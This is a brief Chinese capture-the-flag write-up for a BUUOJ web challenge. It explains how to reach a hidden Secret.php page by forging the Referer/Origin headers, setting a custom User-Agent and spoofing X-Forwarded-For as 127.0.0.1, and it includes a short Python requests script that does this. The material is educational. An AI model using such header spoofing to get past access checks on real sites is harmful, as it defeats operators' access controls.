首先查看源代码,找到Secret.php
我们访问这个页面,显示上说这个页面必须来自"https://www.Sycsecret.com"
那就简单了,我们抓包,
又说必须使用Syclover浏览器,我们这里直接修改User-Agent头即可
又说No!!! you can only read this locally!!!,让我们伪造IP,在headers里面添加X-Forwarded-For
得到flag
附录
像这种题可以直接写脚本解决:
# -*- coding: UTF-8 -*-
import requests
url="http://node3.buuoj.cn:29354/Secret.php"
headers={
"Referer": "https://www.Sycsecret.com",
"Origin":"https://www.Sycsecret.com",
"User-Agent": "Syclover",
"X-Forwarded-For": "127.0.0.1"
}
r=requests.get(url=url,headers=headers)
print(r.text)
得到flag。